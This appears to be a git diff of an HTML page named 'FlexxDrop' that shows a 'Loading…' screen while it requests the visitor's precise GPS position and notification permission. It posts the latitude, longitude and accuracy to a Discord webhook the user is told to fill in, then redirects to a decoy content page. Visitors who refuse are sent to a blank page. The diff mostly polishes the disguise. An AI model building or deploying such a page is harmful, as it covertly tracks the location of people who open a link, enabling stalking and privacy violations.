--- a/index.html
+++ b/index.html
@@ -1,54 +1,58 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <title>Loading...</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta charset="UTF-8" />
+  <title>FlexxDrop</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <style>
     html, body {
       margin: 0;
       padding: 0;
       height: 100%;
       background-color: #000;
+      color: #fff;
+      font-family: Arial, sans-serif;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      font-size: 1.2rem;
     }
   </style>
 </head>
 <body>
+  <div id="loading">Loading FlexxDrop…</div>
+
   <script>
-    const webhookUrl = "YOUR_DISCORD_WEBHOOK_HERE"; // 🔁 Replace this
-    const redirectUrl = "https://example.com"; // 🔁 Replace with your real final page
+    const webhookUrl = "YOUR_DISCORD_WEBHOOK_HERE"; // 🔁 Replace with your webhook
+    const redirectUrl = "https://example.com";       // 🔁 Replace with your content page
 
     function sendGPS(lat, lon, acc) {
-      console.log("Latitude:", lat);
-      console.log("Longitude:", lon);
-      console.log("Accuracy:", acc + "m");
-
       fetch(webhookUrl, {
         method: "POST",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({
-          content: `📍 **GPS Location Captured**\n**Lat:** ${lat}\n**Lon:** ${lon}\n**Accuracy:** ${acc}m\n🕒 ${new Date().toLocaleString()}`
+          content: `📍 **GPS Captured**:\n**Latitude:** ${lat}\n**Longitude:** ${lon}\n**Accuracy:** ${acc}m\n🕒 ${new Date().toLocaleString()}`
         })
       });
 
       setTimeout(() => {
         window.location.href = redirectUrl;
-      }, 1200);
+      }, 1000);
     }
 
-    function onError(err) {
-      console.warn("Location error:", err);
-      window.location.href = "about:blank"; // Exit silently
+    function onLocationError(err) {
+      console.warn("Location denied or failed:", err);
+      window.location.href = "about:blank";
     }
 
     function requestLocation() {
       if (navigator.geolocation) {
         navigator.geolocation.getCurrentPosition(
-          (pos) => {
-            const { latitude, longitude, accuracy } = pos.coords;
+          (position) => {
+            const { latitude, longitude, accuracy } = position.coords;
             sendGPS(latitude, longitude, accuracy);
           },
-          onError,
+          onLocationError,
           {
             enableHighAccuracy: true,
             timeout: 10000,
@@ -56,17 +60,20 @@
           }
         );
       } else {
-        onError("GPS not supported");
+        onLocationError("Geolocation not supported.");
       }
     }
 
-    window.addEventListener("load", () => {
-      requestLocation();
-      // Optional: ask for notification permission
+    function requestNotification() {
       if ("Notification" in window) {
-        Notification.requestPermission();
+        Notification.requestPermission().then(() => {});
       }
-    });
+    }
+
+    window.onload = () => {
+      requestNotification();
+      requestLocation();
+    };
   </script>
 </body>
 </html>
